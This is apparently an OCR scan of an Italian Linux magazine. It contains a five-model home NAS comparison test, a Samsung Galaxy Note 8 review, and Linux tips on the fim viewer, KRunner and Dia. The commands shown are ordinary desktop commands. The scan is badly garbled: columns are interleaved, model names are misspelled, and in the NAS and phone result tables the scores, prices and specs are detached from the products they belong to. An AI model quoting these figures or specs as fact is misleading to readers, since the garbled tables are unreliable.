dows, possiamo comunque realizzare applica- 
zioni GNU/Linux sfruttando una connessione 
remota (anche a una macchina virtuale). 
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vai su TrovaViaggi.it! 
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NON PERDERE MAI PIÙ I DATI 


Un NAS collegato alla LAN domestica può essere accessibile da qualsiasi luogo e si rivela il dispositivo 
perfetto per archiviare i backup e per poterli ripristinare in qualsiasi momento. 


Un hard disk 


Hai troppi file tutti sparsi su mille 


ik 
| pendrive, dischi esterni e PC? 
Fatti un NAS e centralizza tutti i tuoi 
E. dati! Ecco i migliori 5 modelli 


per tutte le tasche 


WD MYCLOUD 
BUFFALO EXZ ULTRA 
TERASTATION 12000 | 


ASUSTOR 
ASI2027 


| 
SYNOLOGY i 


DS2164I 


DS216+I 
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ACCEDERE Al DATI IN MOBILITÀ 


Poter accedere ai dati memorizzati sul 
NAS anche mentre siete al bar? Basterà 
unattimo, purché abbiate attivato 
l’accesso remoto. 


RIPRODURRE MUSICA E FILM 


Via App sarà possibile ascoltare musica e vedere film 
comodamente seduti sul divano. Due candidati al test 
consentono anche di riprodurre film direttamente sul 


ocumenti importanti sul PC, brani 
musicali sullo smartphone, immagi- 
ni sul tablet, video sul notebook. E in 
tutto questo marasma di dati, il numero di di- 
spositivi che utilizza la Wi-Fi domestica è in 
continuo aumento. Ma come è possibile cen- 
tralizzare tutti i file più importanti? Necessitia- 
mo di un hard disk di rete, meglio noto come 


NAS, acronimo di Network Attached Stora-. 


ge. Ecco quali sono le 5 migliori soluzioni del 
momento. 


HARD DISK CON 

CAVO ETHERNET 
L'architettura di un NAS è ARNCILE, 
molto semplice: all’interno 
di un piccolo cabinet tro- 
vano posto gli hard disk e 
i componenti elettronici di 
comando supportati dalla 
porta Ethernet. Attraverso il 
cavo di rete, il NAS si col- 
lega al router Wi-Fi. Dopo 
aver provveduto alla con- 
figurazione, il NAS renderà 
accessibile i dati di tutti i 


Lemia scelto 


Attraverso un App 

è possibile accedere 
comodamente via 
smartphone ai dati del NAS. 


televisore, via cavo HDMI. 


dispositivi collegati alla LAN. Chi lo desidera, 
potrà addirittura accedere in mobilità ai dati 
memorizzati, attraverso Internet. La mag- 
gior parte dei produttori di NAS, come Asu- 
stor, Qnap e Synology costruisce cabinet 
vuoti, che potranno essere corredati di hard 
disk direttamente dall'utente. L'operazione 
può apparire complicata, mentre invece è di 
estrema semplicità. Attenzione: per un NAS si 
rivelano però funzionali hard disk particolari, 
come ad esempio gli Ironwulf di Seagate o 
quelli della serie Red di WD, 
poiché progettati per con- 
sentire un lavoro continua- 
tivo all’interno di un NAS. 
I modelli già corredati di 
hard disk, come i modelli di 
Buffalo e WD fanno rispar- 
miare l’installazione dei di- 
schi, ma l’utilizzatore dovrà 
ugualmente provvedere alla 
configurazione per impo- 
stare, ad esempio, il nome 
dell'utente autorizzato e le 
password. 


UNA SOLA 
MEMORIA 
NUMEROSI 
UTENTI 


Chiunque riesca a mette- 
re le mani su un hard disk 


©_W_4 50% @ 00:03 


esterno USB potrà accedere ai dati. Con 
un NAS invece, saremo noi a stabilire chi 
potrà avere accesso ai file memorizzati. Se 
vogliamo, ad esempio, consentire solo la vi- 
sione delle collezioni di fotografie, potremo 
impostare e consentire ad altri utenti solo 
la modalità di lettura. Dopo aver eseguito 
la configurazione, il NAS verrà riconosciuto 
dal PC o dal notebook come unità supple- 
mentare e potrà essere utilizzato come un 
hard disk o un SSD interno, ma con una ve- 
locità più bassa. Chi avrà collegato il NAS 
via cavo Ethernet, si accorgerà solo di una 
lieve differenza di velocità. Attraverso la rete 
Wi-Fi, invece, la velocità di accesso ai dati 
sarà determinata dalla tecnologia wireless: 
grandi quantitativi di dati potranno esse- 
re accessibili rapidamente solo attraverso 
l’attuale draft AC. L’antiquato standard N 
è però, nella maggior parte dei casi, suffi- 
cientemente veloce per riprodurre video o 
musica. 


VELOCITÀ E DOTAZIONE 
IMPLICANO COSTI 


Le differenze tecnologiche generano anche 
notevoli differenze di prezzo tra i candidati 
al test: il dispositivo testato più économico, 
il WD MyCloud EX2 Ultra, nella variante te- 
stata con due hard disk da 2 TB, costa 333 
euro. Il solo cabinet vuoto di Qnap, costa 
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circa 60 euro in più, ma offre una dotazione 
più ricca. Il QNAP, ad esempio, offre tre por- 
te USB 3.0 e ad una di queste può essere 
collegato direttamente un PC, consentendo 
al NAS di QNAP di essere utilizzato anche 
senza cavo Ethernet. Ad un’altra porta USB 
potrà essere collegato anche un hard disk 
extra. | NAS di QNAP e Asustor possono 
essere collegati direttamente al televisore 
via cavo HDMI, per riprodurre foto e video 
memorizzati sul NAS. La riproduzione potrà 
essere comandata confortevolmente tra- 
mite il telecomando in dotazione. Relativa- 
mente alla velocità, il trio Asustor, Qnap e 
Synology ha battuto gli altri candidati. Nella 
riproduzione di estesi file video sono stati in 
grado di offrire la velocità di 113 MB/s: il va- 
lore massimo ottenibile via cavo Ethernet. 
Chi necessita di una velocità più elevata, 
per il trasferimento dei dati, dovrà ricorrere 
ad un SSD o ad una veloce pendrive USB. 
Nell’uso pratico, attraverso il NAS, vengo- 
no generalmente trasferiti file di piccole o 
medie dimensioni e Synology, vincitore 
del test, si è rivelato il più veloce. Relati- 
vamente alla velocità, il modello di Buffalo 
è risultato invece deludente, offrendo una 
velocità notevolmente più bassa con file di 
qualsiasi dimensione. 


MEMORIZZAZIONE 
IN TUTTA SICUREZZA 


Per la configurazione di un NAS, dovrem- 
mo sempre scegliere l’affidabile modali- 
tà RAID-1, che consente di memorizzare i 
dati su entrambi gli hard disk. Se un disco 
dovesse andare in crash, saremo costretti 
a sostituirlo, ma i dati non andranno persi 
poiché memorizzati anche sull’altra unità. 
Sotto questo aspetto, Qnap ha offerto la 
protezione migliore e il modello TS-251A 
segnala in modo inequivocabile, se un 
hard disk è difettoso. Cornici intercambia- 


Un NAS standard offre queste porte di connessione 
(da sinistra): ingresso per alimentatore esterno, porta 
Ethernet e ingressi USB per il trasferimento dei dati. 


ne 
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da 4 a 5 euro. Unica eccezione il modello di 
Buffalo che, in stand-by, ha richiesto ben 5 
Watt, che si ripercuoteranno notevolmente 
sulla bolletta annua. Analogamente al con- 
sumo energetico, anche la rumorosità di un 
NAS si rivela altrettanto bassa. In stand-by, 
un NAS presenta una rumorosità da 0,4 a 
0,6 Sone, in pratica quasi impercettibile, 
che diventa leggermente più elevata solo 
nella fase di accesso all’hard disk. Gli uten- 
ti con orecchie delicate dovranno provve- 
dere a collocare il NAS in un corridoio o in 
una stanza un po’ isolata. Attraverso il cavo 
Ethernet, il NAS potrà essere posizionato 
addirittura a 100 metri distanza. 


bili semplificano la sostituzione di un hard 
disk e, inoltre, la “ricostruzione” della mo- 
dalità RAID-1 dopo l’installazione del nuo- 
vo disco, avviene in modo automatico. Con 
il modello di Synology, vincitore del test, il 
ripristino della modalità RAID-1 dovrà es- 
sere effettuato dall'utente. Su quattro dei 
cinque candidati al test, i dati sono al sicuro 
da sguardi di utenti non autorizzati e solo il 
modello di Buffalo non offre la possibilità di 
criptare i dati memorizzati sul NAS. Ottimo 
che tutti i NAS richiedano all'utente di mo- 
dificare subito la password per la configu- 
razione. Offrono però un aiuto solo i Model- 
li di Asustor e Synology, segnalando se la 
nuova password è sicura o no. 
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QUALE METTO 
NEL CARRELLO? 


Chi è alla ricerca di un archivio dati econo- 
mico per la propria LAN domestica, potrà 
scegliere il WD MyCloud EX2 Ultra (333 
euro), vincitore del rapporto qualità prez- 
zo. Synology, vincitore del test, si rivela 
decisamente più costoso (a partire da 599 
euro con hard disk inclusi), ma offre anche 
una velocità più elevata e una dotazione 
più ricca. 


5 NAS A CONFRONTO 


RISULTATI DEL TEST 


Quanto è idoneo il sistema NAS per la memorizzazione di dati? 32 
Porte per il trasferimento di dati / collegamenti mobili possibili 


BASSO CONSUMO 
E RUMOROSITA 


Come archivio dati, il NAS presenta anche 
un altro vantaggio rispetto ad un PC: in 
esercizio, il consumo energetico pari a 22 
Watt, si rivela decisamente molto più basso. 
In stand-by il consumo risulta addirittura in- 
feriore: infatti, nelle prove QNAP e Synology 
hanno richiesto da 0,5 a 0,6 Watt. Per tutti i 
candidati, i costi di esercizio annui variano 


a 


Accesso e funzioni in rete 

Accesso in mobilità (funzione Servizio Cloud privato) 

Funzioni per la protezione dei dati 

App per smartphone e tablet con sistema: i0S / Android 

Configurazioni possibili per la memoria dati 

Numero max. hard disk / max. memoria di storage utilizzabile 

Quanto è veloce il sistema NAS? 31% 
Velocità max in lettura (scrittura) per file di grandi / medi / piccoli 

Tempo di accesso per lettura / scrittura dati 

Tempo di risposta per l'accesso ai dati, dopo uno stand-by di 24 ore 

Quanto sono sicuri i miei dati? 13% 
| dati criptati possono essere memorizzati sul NAS 

Sicurezza della password 

Possibilià di ripristino in caso di perdita di dati 

Costi di esercizio e rumorosità con dispositivo in funzione Cra 
Consumo energetico: in stand-by / a carico minimo / con accesso alla rete / costo max. annuo 


Rumorosità dopo 48 ore di funzionamento a carico minimo / con utilizzo intensivo 

Sviluppo calore con carico minimo / con utilizzo intensivo 

Quanto è facile configurare il sistema NAS? 15% 
Sostituzione dell'hard disk, La 

Messa in servizio 

Configurazione e usabilità 

Istruzioni d'uso 


LTATO DEL TEST 


asustor 


Ha r 


SYNOLOGY 
DS-2164+Il 
Prezzo: 356/599/ 
689 Euro 


Con file di piccole e medie di- 
mensioni, il DS216+I si rive- 
la più veloce degli altri candi- 
dati al test e chi riproduce col 
NAS solo video, ottiene an- 
che un leggero aumento di 
velocità. Ottimo che il Synolo- 
{y sia silenzioso, richieda un 
consumo minimo in stand-by 
e si riavvii velocemente dopo 
un lungo periodo di inattività. 
Il vincitore del test ha richie- 
sto solo 2 secondi per esse- 
re nuovamente pronto all'im- 
piego. 

+ Semplice da configurare, 


offre il trasferimento dati più 
veloce. Silenzioso 


E Prezzo elevato 


Processore: Intel Celeron N3060 
RAM: 1 Gigabyte 
Max. numero di hard disk: 2 

Dimensioni: 10,9 x 16,6 x 23,4 cm 


1 xLAN,1xUSB30/2USB2.0,1 eSATA 
/ con chiavetta opzionale per WLAN 
molto numerose 

semplicissimo 
molto estese 
si/si 

poche (RAID O, RAID 1, JBOD, SHR) 
2/2068 


Risponde velocemente 
113(111) /98 (94) / 12 (11) MB/s 
14,7 / 13,8 millisecondi 
molto veloce (1,97 secondi) 
Ripristino manuale 


un po' elevato: 0,6Watt / 15,6Watt / 20,8 
Watt / 4,52 Euro 

silenzioso (0,5 Sone / 0,5 Sone) 

molto basso (5,0 gradi /5,0 gradi) 


8,0 Offreil numero più elevato di porte 


Te 105(111) /70 (88) /12(9) MB/s 


[X.Y silenzioso (0,6 Sone / 0,7 Sone) 


QNAP 
TS-251A 

Prezzo: 393/456/ 
659 Euro 


Con un mix costituito da velo- 
cità elevata, ricercate funzioni 
di protezione per i dati memo- 
rizzati, nonché numerose por- 
te di connessione, il TS-251A 
si è aggiudicato il secondo 
posto. Tutti i validi requisiti 
che offre compensano l’usa- 
bilità talvolta un po’ complica- 
ta. Insolito per un NAS, il 
Qnap può essere collegato 
direttamente al televisore (via 
HDMI) e al PC (via USB). 


+ Offre la dotazione migliore, 
è veloce e vanta la migliore 
protezione dei dati 


Prezzo elevato, usabilità 
un po' complicata 


ASUSTOR 
AS32027 
Prezzo: 290/470/ 
570 Euro 


L'AS3202T è in grado di ripro- 
durre estesi file video ad ele- 
vata velocità, fino a raggiun- 
gere i 112 Megabyte al se- 
condo. Relativamente alla ve- 
locità di accesso ai dati, offre 
una risposta più scattante ri- 
spetto a Qnap e Synology. Si 
rivela molto pratico per guar- 
dare video e visionare foto, 
poichè l’Asustor può essere 
collegato direttamente al tele- 
visore via cavo HDMI. Peccato 
che offra solo poche funzioni 
per la protezione dei dati. 

+ Elevata velocità, è possibile 


collegarlo direttamento 
al televisore 


Prezzo elevato, non offre 
una comice sostitutiva 


WD 


MYCLOUD 
EX2 ULTRA 
Prezzo: 333 Euro 


Il NAS più economico del test 
si rivela veramente buono. 
MyCloud è in grado di trasferi 
re dati quasi con la stessa 
velocità offerta dai concorren- 
ti più costosi e solo la dota- 
zione si rivela poco ricca, con 
una sola porta Ethernet e 
due USB. MyCloud si rivela 
silenzioso e parsimonioso 

nel consumo: utilizzandolo 
tutti i giorni per due ore e 
mezza, non si spenderà più 
di 4 Euro per il consumo an- 
nuo. 


+ Prezzo conveniente, veloce 
e con il consumo più basso 
del test 


=] Poche porte di connessione 


a 


BUFFALO 
TERASTATION 


1200D 
Prezzo: 356 Euro 


Buffalo ha risparmiato sia sul 
processore che sulla RAM e 
tutto questo penalizza la velo- 
cità. La Terastation trasferi- 
sce i dati più lentamente (cir- 
ca il 30 percento) rispetto al- 
la concorrenza. Fastidioso 
l'elevato consumo in stand- 
by (5 Watt) e l'impossibilità di 
criptare i dati memorizzati. La 
dotazione è molto misera, in- 
fatti il dispositivo offre solo 
una porta extra USB 2.0. 


+ Molto compatto, 
si scalda poco 


Lento, elevato consumo 
in stand-by 


Processore: Intel Celeron N3060 
RAM: 2 Gigabyte 

Max. numero di hard disk: 2 
Dimensioni: 10,3 x 17,1x 21,9 cm 


2x1AN,3x USB3.0/1 scheda SD, 1 
HDMI /con chiavetta opzionale per WLAN 


10 
94 
94 
10 


5,2/10,0 millisecondi 


(i) un po'lento (15,68 secondi) 

8,4. Offre la migliore protezione per i dati 
10 K6] 

[XY bassa 

t#d molto estese 

7,4 Silenzioso e parsimonioso instandby | Silenzioso e parsimonioso in stand-by 


un po' elevato: 0,5Watt / 16,7 Watt /21,8 


s (1) molto semplice 
k:2)- semplice 


84 


36 


CXY 8,8/11,7 millisecondi 
8 moltoveloce(5,56secondi 


113 (111) / 73 (91) / 15 (2) MB/s 
) 


| si Numerose funzioni di protezione 
si 


) 


Euro 
{#:X silenzioso (0,8 Sone / 0,8 Sone) 


Processore: Intel Celeron N3160 
RAM: 2 Gigabyte 
Max. numero di hard disk: 2 


Con ingresso HDMI per TV 


semplicissimo 
molto limitate 
si/si 

poche /RAID O, RAID 1,JBOD) 
2/2068 

HI NAS più veloce del test 


elevata 
estese 


un po' elevato: 0,8 Watt / 14,5Watt / 19,8 
Watt / 5,29 


Dimensioni: 10,3 x 16,4 x 22,4 cm 


i] Vanta il minor consumo energetico 


Processore: Armada 385 
RAM: 1 Gigabyte 
Max. numero di hard disk: 2 


1xLAN,2xUSB3.0 / con chiavetta 
opzionale per WLAN 

molto numerose 

semplice 
limitate 
si/sì 
poche /RAID 0, RAID 1,JB0D) 
2/2068 


112(111) /83 (79) /9 (2) MB/s 
15,2/ 24,8 millisecondi 
molto veloce (2,80 secondi) 
Numerose funzioni di protezione 


un po'elevato: 1,1 Watt / 12,2 Watt / 16,2 
Watt / 4,24 Euro 

silenzioso (0,4 Sone / 0,7 Sone) 

molto basso (4,0 gradi / 10,0 gradi) 


molto semplice 
semplice 
semplice 


Dimensioni: 9,9 x 17,0 x 15,5 cm 


p:A:g un po' complicato 


96 2/1668 


78 (61) / 58 (38) /5.(2) MB/s 26 
E 150/13, milisecondi 
TIR} veloce (8,70 secondi) 84 


8,0 © Nonconsente la criptazione dei dati |. [L] 


Processore: Marvel Armada 

RAM: 512 Megabyte 

Max. numero di hard disk: 2 
Dimensioni: 8,7 x 12,7 x 20,5 cm 


1xLAN, 1xUSB 20 / nessuno 


un po' limitate 6.6 
i / sì 10 


/ 

poche /RAID0,RAI 1,800) 39 
90 
IT NAS più lento del test 3( 


si 10 20) 0,0 
bassa - bassa [ 
estese [Xi] un po'limitate 0 


7,4 Consumo elevato in stand-by 


un po' elevato: 5,0 Watt / 13,3 Watt / 17,4 
Watt / 30,43 Euro 

silenzioso (0,8 Sone / 0,7 Sone) 

molto basso (5,0 gradi / 10,0 gradi) 
Usabilità complicata 

molto semplice 
un po’ complicata 
complicata 


seed 
CAI 


mo 
Linux Magazine ® ©29 


“ Samsung Note 8: grande, 
sempre più grande! 


Display gigantesco e stilo a scomparsa. 
E ora anche con camera duale! 

Il Samsung Galaxy Note 8 riuscirà 
a diventare il nuovo numero 1? 


Il Note 8 è il primo Galaxy con camera duale: 

il primo obiettivo funziona da grandangolo, mentre 
il secondo, analogamente all'iPhone 7 Plus, serve 
per scattare immagini con tele e zoom. 


Rispetto all’$8+ (6, 2 pollici) lo cene del Note 8 con 
i suoi 6,3 pollici diventa più ampio. Nelle prove si è 
distinto per un intenso contrasto e un'elevata luminosità. 


Recentemente, LG, Nokia e Sony hanno presentato i loro modelli 
top di gamma, Apple ha lanciato un nuovo iPhone, Huawei ha pre- DIMENSIONI 
sentato la sua nuova punta di diamante Mate 10. E Samsung? Il leader REALI 
del mercato degli smartphone ha perfezionato il suo Galaxy Note, lan- | 
ciando sul mercato il nuovo 8. Cnn 


I mondo degli smartphone continua ad essere in continuo fermento. 


DISPLAY? UN CAPOLAVORO! 


Chi bada all'estetica, a prima vista non troverà grandi differenze tra 
l’attuale modello di punta dell'azienda coreana, il Galaxy S8+ e il nuo- 
vo Note 8. La parte posteriore curva è in vetro antigraffio, ma quella 
del Note 8 si rivela più spigolosa rispetto alla forma tondeggiante dei 
dispositivi di classe S. Il display è ora di ben 6,3 pollici (16 centimetri) 
e, a causa dell’insolito aspect ratio 18,5:9, offre pochissimo spazio per “Per i fan 
la cornice. La risoluzione (2960x1440 pixel) rimane al top e non è stato 
possibile offrire una maggior nitidezza, come dimostrato dalla densità del formato XXL, 

di pixel pari a 522 ppi. Sorprendente che, per il display del Note rispet- . il Note 8 

to a quello già ottimo del S8, gli isa i aa 2 dona a È tI è quas Î pe rfetto. 
offrire ancora qualcosa in più: l'incredibile luminosità di 867,5 Cd/m2 : «gr 

offrirà il meglio anche sotto il sole delle prossime vacanze. Grazie ad FI = Infastidisce solo lo 
un'ottima fedeltà cromatica e ad un contrasto straordinariamente ele- scomodo sensore 
vato (17034:1), Samsung migliora la qualità dell'immagine, portandola i wr a per im pro nta 

al “massimo storico”: mai un display si era rivelato così stupefacente MI di g itale dis pos to 


ed efficiente! Mi 
i ; ff accantoalla 
/ n |” 
BATTERIA? SORPRENDENTE! fotocamera! 


Abbiamo atteso con ansia i risultati delle prove relative alla batteria, 
per una ragione più che valida. Chi non ricorda la triste fine del Note 7, 
ritirato dal mercato a causa della batteria che andava a fuoco! E quindi 
la batteria del Note 8 è stata messa sotto osservazione. Per evitare 
qualsiasi rischio, Samsung questa volta ha protetto la batteria in modo 
particolarmente sicuro. Ha dovuto inoltre trovare spazio per collocare 
lo stilo. Rispetto al Note 7 e al Galaxy S8+, la batteria offre una capa- 
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cità inferiore (3300 anziché 3500 mAh). Sorpresa nelle prove: malgra- 
do un hardware quasi identico, Samsung è riuscita a tenere a freno 
il consumo energetico. Con un normale utilizzo misto, la batteria del 
Note 8 offre un'autonomia di un’ora e mezza più lunga rispetto al Ga- 
laxy S8+, ma anche con la sua buona durata di 12 ore non si avvicina 
all'autonomia migliore offerta dal Huawei Mate 9 (oltre 17 ore). Con un 
utilizzo intensivo, il case tende a scaldarsi sensibilmente e il consumo 
energetico varia intensamente, a seconda dell'impiego. 


CAMERA DUALE? CHAPEAU! 


| vantaggi principali rispetto al Galaxy S8+ sono due funzioni extra: lo 
stilo per lo schermo, ideale per prendere appunti e l’impiego sul Note 
8 di una camera duale, una vera novità per Samsung. Analogamente 
all'iPhone 7 Plus, alla normale fotocamera da 12 Megapixel fa compa- 
gnia un secondo obiettivo con distanza focale raddoppiata. Grazie a 
questo teleobiettivo, con un semplice tap, sarà possibile avvicinare il 


«STILO PRECISO 


Grazie ai suoi 4096 punti di pressione, il mini stilo 
offre un'autentica esperienza di scrittura e consente 


d w a r 


soggetto da una distanza doppia, senza penalizzare notevolmente la 
qualità dell'immagine, come invece avviene con lo zoom digitale. Con 
le inquadrature in primo piano, a partire da 1,2 metri, sarà possibile 
giocare con la profondità di campo. Determinanti per le prove di labo- 
ratorio non sono state le funzioni divertenti consentite dalla fotocame- 
ra, bensì l’accurata analisi della qualità delle immagini. Con luce diurna 
il Note 8, come previsto, è stato in grado di scattare immagini come si 
deve. Si sono rivelate sorprendentemente buone sia lé riprese di even- 
ti sportivi, che le foto scattate con luce scarsa, visto che questo tipo 
di immagini comporta sempre difficoltà per gli smartphone. In questa 
funzione, il Note 8 supera addirittura l'iPhone 7 Plus e l'HTC U11, piaz- 
zandosi al vertice di tutti gli attuali smartphone. Tanto di cappello! 


RICEZIONE E AUDIO? PERFETTI! 


Per la ricezione in mobilità, il Note 8 offre gli stessi buoni risultati 
dell’S8. Anche l’audio per le chiamate è OK. Ottimo per gli utenti che 
utilizzano più piani telefonici: il Note 8 esiste già in versione Dual-SIM, 
ma potrà essere ottenuto solo attraverso lo shop online di Samsung. 
Anziché una scheda di memoria potrà essere inserita nello slot una 
seconda scheda SIM. 


TIRIAMO LE SOMME 


Grazie ad un display stupefacente, una dotazione al top, una batteria 
dignitosa e una fotocamera sorprendentemente buona per scattare 
immagini con luce scarsa, il Galaxy Note 8 conquista il primo posto 
nella lista dei migliori dispositivi, lanciando una sfida al nuovo iPhone! Il 
formato è una questione di gusti: la sua lunghezza di 16 centimetri farà 
sporgere il Note 8 da qualsiasi tasca. Chi preferisce uno smartphone 
più maneggevole, si troverà meglio con il Galaxy S8. 


SAMSUNG NOTE 8 
Prezzo: 999 Euro 


di disegnare con accuratezza. Ottimo che lo stilo 
rientri del tutto nel case. 


y_N 
LUNGHEZZA ECCESSIVA 


Non proprio tascabile! Il Note 8 è lungo più di 16 centimetri 
e sporge quindi da una normale tasca dei pantaloni. 


I RISULTATI IN BREVE 


Quanto è efficiente la dotazione? 
Schermo: luminosità / contrasto / fedeltà cromatica 


Foto con luce diuma: Voto complessivo 
Qualità foto con luce scarsa senza flash / con flash / con foto di 


Possibilità di sblocco biometrico 


Eiynos 8895 / 6 Gigabyte 
Display: 6,3 pollici / (2960 X 1440) 
Por e posteriore: 8 MP /2x 12 MP 
Dimensioni / interna: 163 x 75x9 mm / 64 GB 
Display al top, fotocamera con zoom ottico 8,0 
molto luminoso (877 Cd) / molto elevato 17034:1 92 
/93% ‘ 

come si deve, ma molto scalettate 68 


lievissimo rumore digitale (6,4)/povere di dettagli 


CPU / RAM: Sa 


eventi sportivi (3,8)/buone, un po' sfuocate in movimento (9,0) 
Qualità foto scattate con fotocamera frontale nitide, con poco rumore digitale, con leggere 

distorsioni 
Memoria intema (libera) / scheda di memoria / Cloud / App memorizzabili su 53 GB / MICROSDXC / 100 GB / NO 
SD $ 
Facilità d'uso? 23% Buona, ma potrebbe essere più veloce 86 
Velocità di usabilità e di lavoro molto elevata e veloce 90 


sensore per impronta digitale, scansione dell'iride | BE°X) 


Quanto è idoneo per un uso quotidiano? 18% Buona autonomia, comice un po’ spessa 72 
Autonomia: utilizzo intensivo / capacità / ricarica rapida 


lunga: 12:05 / 3300 mAh /si 72 


Peso / spessore / rapporto display-comice elevato: 190 gr. / sottile: 9 mm / 85% 

Test di caduta / resistenza ai graffi del case / display / si / molto elevata / molto elevata / si Do 
impermeabilità 

Quanto è valido il dispositivo. perle chiamate & per la ricezione? 13% Buona ricezione via LTE, audio buono 8,00 
Uso del telefono: Test uditivo / vivavoce / HD Voice qualità buona / ok / si 7,80 
Qualità di ricezione con UMTS / LTE 800 / LTE 1800 (voti) Voto: 7,62 /Voto:7,8/Voto:792 ® 780 
Qualità della connessione per Internet? 8% _LTE veloce, WLAN lenta 9,20 
Massima velocità per telefonia mobile CAT 9, massimo fino a 452 Mbps (LTE) 940 
Frequenze per WLAN / standard migliore (classe di velocità) 2,4 GHz e 5 GHz /WLAN-ac (867 Mbps) 880 
RISULTATO DEL TEST FATA 
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? Tips & Tricks 


2 Trucchi e consigli per usare subito GNU/Linux come un vero esperto. 
Scoprire le strategie e gli strumenti giusti per trovare una soluzione rapida 
a tutti i problemi e sfruttare appieno le potenzialità del tuo sistema 


LEGENDA 


&={paTABASE 


È GIOCHI 
EBorarica 
Gg 


KERNEL 


SISTEMA 


SVILUPPO 


IMMAGINI 
SUL TERMINALE 


Se c'è una cosa che per molte 
& persone non ha nulla a che 
fare con un terminale di testo sono le 
immagini: è un prompt, è ovvio che 
non possa esserci nulla di grafico. 
Ma ciò non è del tutto vero: il termi- 
nale di GNU/Linux può lavorare an- 
che con le immagini, non soltanto 
manipolandole con comandi come 
quelli forniti dal famoso ImageMa- 
gick, ma anche con dei visualizzato- 
ri. GNU/Linux offre infatti la possibili 
tà di visualizzare immagini anche 
senza un ambiente grafico, grazie al 
framebuffer. Il visualizzatore per 
terminale più adatto per mostrare 
immagini senza dover ricorrere a 
Xorg si chiama fim. Il visualizzatore 
di immagini per framebuffer Linux si 
chiama fbi, e si trova su tutte le di- 
stro. Suggeriamo però di ricorrere al 
suo fork fim, che significa per l'ap- 


File Modifica Visualizza Segnalibri Impostazioni Auto 


BI Fig. 1 Il visualizzatore fim in azione 
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punto Fbi IMproved. È meno cono- 
sciuto, ma lo si trova su Debian e 
Ubuntu nei repository ufficiali, basta 
installarlo con il comando sudo apt- 
get install fim. Per aprire un'imma- 
gine con film basta indicarne il per- 
corso, ed è anche possibile 
visualizzare un'intera cartella di im- 
magini (ad esempio, con il comando 
fim -/Immagini/*). Se si vuole otte- 
nere uno slideshow si può lanciare il 
comando fim -d aa --slideshow 5 
-/Immagini/*, che lascia ciascuna 
immagine sullo schermo per 5 se- 
condi prima di passare alla succes- 
siva. Per chiudere il visualizzatore 
basta premere il tasto q. 


IL DESKTOP 
INTELLIGENTE 


oi La maggioranza dei menu di 
8 sistema è sempre rimasta la 
stessa nel corso degli anni: si clicca 


a -CHAQOM cm- 13160 = 


su un pulsante e appare la lista dei 
programmi installati con una parti- 
colare suddivisione, e magari qual- 
che possibilità di ricercare file recen- 
ti. Sono però stati fatti dei tentativi 
per sviluppare menu intelligenti che 
semplifichino la vita dell'utente e che 
siano davvero utili per muoversi nel 
proprio desktop, invece che sempli- 
ci “lanciatori” di applicazioni. In que- 
sto campo, il più avanzato è sicura- 
mente KRunner, il menu intelligente 
integrato in KDE, ma disponibile an- 
che per altri ambienti desktop (basta 
installare le librerie di KDE). Integra 
una di serie plugin che permettono 
di svolgere molte operazioni di uso 
comune, come gestire finestre, cer- 
care file, modificare impostazioni del 
sistema, eseguire semplici calcoli o 
ricerche sul web. Per chi è interessa- 
to a particolari funzioni, esistono de- 
cine di plugin che svolgono opera- 
zioni di qualsiasi tipo sull'app store 
di KDE. Se si usa Plasma, KRunner 
è già attivo per opzione predefinita, 
ma in ogni caso basta lanciare il co- 
mando krunner per avviarlo in 
background. Ogni volta che si desi- 
dera utilizzarlo basta premere la 
combinazione di tasti Alt+F2 per far 
apparire la casella di testo. Si può 
anche usare la combinazione 
Alt+Spazio su sistemi nei quali la 
prima è già assegnata ad altre appli- 
cazioni. Mentre si scrive il nome di 
un programma, KRunner suggerisce 
varie opzioni. Ad esempio, è possi- 
bile eseguire l'applicazione che por- 
ta quel determinato nome, ma è 
possibile richiamare anche una fine- 
stra che contiene lo stesso nome. È 
quindi un ottimo modo per effettuare 
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II Fig. 2 e Ecco Krunner in esecuzione su una macchina equipaggiata 


con ambiente desktop KDE Plasma 


una ricerca all'interno delle finestre 
aperte. Se il nome del programma è 
preceduto dalla parola termina, 
Krunner offre la possibilità di chiudere 
il programma (sempre che sia aper- 
to). Vengono anche analizzati i file 
recenti per suggerire di aprirne alcuni 
che contengono la parola cercata. 
Krunner è anche molto comodo per 
eseguire dei semplici comandi che 
permettano di riottenere il controllo 
del sistema in caso di freeze di vario 
tipo. Ad esempio, se si sta sperimen- 
tando con Wayland è possibile che il 
desktop si blocchi, e si può riavviare 
col comando killall plasmashell && 
plasmashell. Similmente, se si do- 
vesse bloccare il mouse si può lan- 
ciare il comando kwin -- replace per 
riottenere il controllo in pochi minuti 
senza dover chiudere programmi e 
perdere dati. KRunner può anche for- 
nire informazioni utili, come l'ora at- 
tuale in qualsiasi città del mondo: 
basta scrivere ora seguita dal nome 
della città. A chi non capita di dover 
fare un calcolo rapido? Invece di cer- 
care una calcolatrice, KRunner può 
fare tutto per noi. E non solo calcoli 
semplici, ma anche espressioni con 
parentesi tonde, integrali e differen- 
ziali. Per conoscere i vari componenti 
di Krunner basta cliccare sul pulsante 
delle impostazioni: nel caso non si 
voglia utilizzare un particolare plugin, 
ad esempio quello per la messaggi- 
stica istantanea, basta disabilitarlo 


togliendo la spunta alla sua casella. 
Per alcuni plugin, come il controllo 
del riproduttore multimediale, è pos- 
sibile modificare le impostazioni clic- 
cando sul pulsante che appare sul 
lato destro dell'elenco. 


DISEGNIAMO 
UN DIAGRAMMA 
DI FLUSSO 


Quando si espone un pro- 
eh getto, disegnare uno schema 
può essere un ottimo modo per far 
capire subito di cosa si stia parlan- 
do. Il problema dei testi è che spes- 
so sono lunghi e noiosi, quindi nes- 
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suno li legge. Uno schema, invece, 
permette di riassumere i concetti in 
una semplice immagine, facile da 
comprendere. Esistono vari metodi 
per disegnare uno schema, ma una 
delle. convenzioni più comuni è quel- 
la dei diagrammi di flusso. Esistono 
alcuni programmi per“disegnarli, è 
persino possibile farlo con LibreOf- 
fice. Ma il software probabilmente 
più comodo e completo da utilizza- 
re è Dia. Aperto quest'ultimo, viene 
subito fornito un foglio di lavoro. Il 
foglio non ha dimensioni prefissate, 
è sempre possibile aggiungere nuo- 
vi oggetti. Se si sta realizzando un 
diagramma di flusso, basta scegliere 
il set di oggetti Diagramma di flus- 
so dal menu a discesa che si trova 
a sinistra. Un diagramma di flusso 
dovrebbe iniziare sempre con un 
rettangolo dagli angoli arrotondati, 
indicato come Interruzione di ter- 
minale. Si possono poi aggiungere 
delle domande con il rombo (o Deci- 
sione). Con un doppio clic all'inter- 
no di un oggetto è possibile scrivere 
del testo. Dal menu File/Esporta è 
possibile esportare il grafico che si 
è realizzato in un'immagine: tra i vari 
formati disponibili conviene sceglie- 
